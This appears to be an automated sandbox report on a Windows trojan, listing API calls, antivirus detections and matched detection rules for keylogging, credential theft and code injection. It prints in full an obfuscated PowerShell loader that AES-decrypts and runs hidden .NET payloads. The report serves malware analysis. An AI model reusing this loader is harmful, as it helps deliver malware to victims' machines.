 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f33000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat
FireEye Trojan.GenericKD.67626538
Arcabit Trojan.Generic.D407E62A
BitDefender Trojan.GenericKD.67626538
MicroWorld-eScan Trojan.GenericKD.67626538
Emsisoft Trojan.GenericKD.67626538 (B)
MAX malware (ai score=87)
GData Trojan.GenericKD.67626538
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Steal credential rule local_credential_Steal
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Steal credential rule local_credential_Steal
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
cmdline C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat
cmdline "C:\Users\test22\AppData\Local\Temp\build_SC.bat.exe" -w hidden -c $VWrg='Sptxljlitxljttxlj'.Replace('txlj', '');$poxH='Loadtxlj'.Replace('txlj', '');$PSUs='EntrtxljyPtxljointxljttxlj'.Replace('txlj', '');$JWKh='GettxljCutxljrretxljntPtxljrtxljocetxljsstxlj'.Replace('txlj', '');$uMOp='ChtxljangetxljExttxljenstxljiotxljntxlj'.Replace('txlj', '');$ngbA='EletxljmtxljenttxljAtxljttxlj'.Replace('txlj', '');$Idpk='MaitxljnMtxljotxljdutxljletxlj'.Replace('txlj', '');$HZsE='TrtxljantxljsftxljormtxljFitxljnaltxljBlotxljcktxlj'.Replace('txlj', '');$qaJF='FromtxljBtxljatxljsetxlj64txljStxljtrintxljgtxlj'.Replace('txlj', '');$WYHj='CtxljreatxljteDtxljecrtxljyptotxljrtxlj'.Replace('txlj', '');$Yxzl='RetxljadtxljLinetxljstxlj'.Replace('txlj', '');$XZtr='Intxljvotxljktxljetxlj'.Replace('txlj', '');function JeoHt($ELZLV){$PsSBT=[System.Security.Cryptography.Aes]::Create();$PsSBT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsSBT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsSBT.Key=[System.Convert]::$qaJF('ysmJpAaiNCwHWX8owtLbwDXbvqF4qqJv/N6iULJxQX4=');$PsSBT.IV=[System.Convert]::$qaJF('KkVvrh415rYbWSxbwOYxSw==');$vXLcw=$PsSBT.$WYHj();$XqKlx=$vXLcw.$HZsE($ELZLV,0,$ELZLV.Length);$vXLcw.Dispose();$PsSBT.Dispose();$XqKlx;}function vIJeV($ELZLV){$fXyGt=New-Object System.IO.MemoryStream(,$ELZLV);$vwbHF=New-Object System.IO.MemoryStream;$QVgMh=New-Object System.IO.Compression.GZipStream($fXyGt,[IO.Compression.CompressionMode]::Decompress);$QVgMh.CopyTo($vwbHF);$QVgMh.Dispose();$fXyGt.Dispose();$vwbHF.Dispose();$vwbHF.ToArray();}$BZAmP=[System.Linq.Enumerable]::$ngbA([System.IO.File]::$Yxzl([System.IO.Path]::$uMOp([System.Diagnostics.Process]::$JWKh().$Idpk.FileName, $null)), 1);$hOQTZ=$BZAmP.Substring(2).$VWrg(':');$OGRUZ=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[0])));$aLVEO=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[1])));[System.Reflection.Assembly]::$poxH([byte[]]$aLVEO).$PSUs.$XZtr($null,$null);[System.Reflection.Assembly]::$poxH([byte[]]$OGRUZ).$PSUs.$XZtr($null,$null);
Process injection Process 964 resumed a thread in remote process 2252
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2252
1 0 0